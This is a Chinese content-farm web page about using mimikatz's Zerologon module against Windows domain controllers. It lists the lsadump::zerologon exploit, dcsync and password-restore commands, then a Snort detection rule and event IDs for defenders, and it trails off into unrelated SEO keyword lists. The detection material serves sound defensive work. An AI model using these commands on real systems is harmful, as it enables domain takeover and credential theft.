mimikatz怎么利用zerologon攻击域控服务器
发表于:2025-02-05 作者:千家信息网编辑
千家信息网最后更新 2025年02月05日,本篇内容主要讲解"mimikatz怎么利用zerologon攻击域控服务器",感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习"mimikatz怎么利用zerol
千家信息网最后更新 2025年02月05日mimikatz怎么利用zerologon攻击域控服务器
本篇内容主要讲解"mimikatz怎么利用zerologon攻击域控服务器",感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习"mimikatz怎么利用zerologon攻击域控服务器"吧!
0x01 前言
mimikatz 20200918版本支持通过zerologon漏洞攻击域控服务器。下载链接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix
官方利用截图如下
mimikatz相关命令
lsadump::zerologon /target:dc.hacke.testlab /account:dc$
poclsadump::zerologon /target:dc.hacke.testlab /account:dc$ /exploit 通过zerologon
漏洞攻击域控服务器lsadump::dcsync
lsadump::postzerologon /target:conttosson.locl /account:dc$ #
恢复密码
snort 检测规则
alert tcp any any -> any ![139,445] (msg:"Possible Mimikatz Zerologon Attempt"; flow:established,to_server; content:"|00|"; offset:2; content:"|0f 00|"; distance:22; within:2; fast_pattern; content:"|00 00 00 00 00 00 00 00 ff ff 2f 21|"; within:90; reference:url,https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916; classtype:attempted-admin; sid:20166330; rev:2; metadata:created_at 2020_09_19;)
pcap包
利用zerologon漏洞攻击域控的数据包,方便同学们写完规则做测试pcap github下载地址
windows事件管理器自查
在未打补丁的域控,重点查看windows事件管理器中,eventid为4742或者4624, 5805
在windows 8月更新中,新增事件ID 5829,5827,5828,5830,5831。蓝队可以重点关注这几个事件ID以方便自查
当在初始部署阶段允许存在漏洞的Netlogon安全通道连接时,将生成事件ID 5829。 管理员可以监控事件ID 5827和5828,这些事件ID在存在漏洞的Netlogon连接被拒绝时触发 5830,5831 如果"域控制器:允许易受攻击的Netlogon安全通道连接"组策略允许连接。
mimikatz通过zerologon攻击成功后,将会留下事件id为4648。
到此,相信大家对"mimikatz怎么利用zerologon攻击域控服务器"有了更深的了解,不妨来实际操作一番吧!这里是网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!
攻击
事件
服务器
服务
漏洞
管理
安全
内容
规则
通道
重点
学习
自查
实用
更深
成功
兴趣
前言
同学
命令
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
西安德纵网络技术有限公司
退伍学软件开发找工作
网络安全在国家发展中的作用
锐捷服务器快捷键
得到软件开发
工信加强网络安全工作
移动公司网络安全预案
上海品牌软件开发服务优势
关于网络安全教育的必要性
阿里巴巴服务器装在哪里
撤销网络安全等保测评证书
关于食品网络安全培训内容
学完数据库可用于什么技术
设计点赞功能数据库
昇腾 服务器
制作网络安全与执法的目的
孤岛行动为什么服务器不响应了
gp数据库临时空间查询
网络安全事关国家安全国际
游戏公司租用服务器价格
游戏服务器扩容教程
人社数据怎么进行网络安全保护
虹口区网络技术服务参考价格
上海网络技术服务比较
数据库中的表怎么删除
政务服务器的英文
网络技术专业职业岗位职责
惠来天气预报软件开发
会计数据库类型是什么
服务器人数过多还能进吗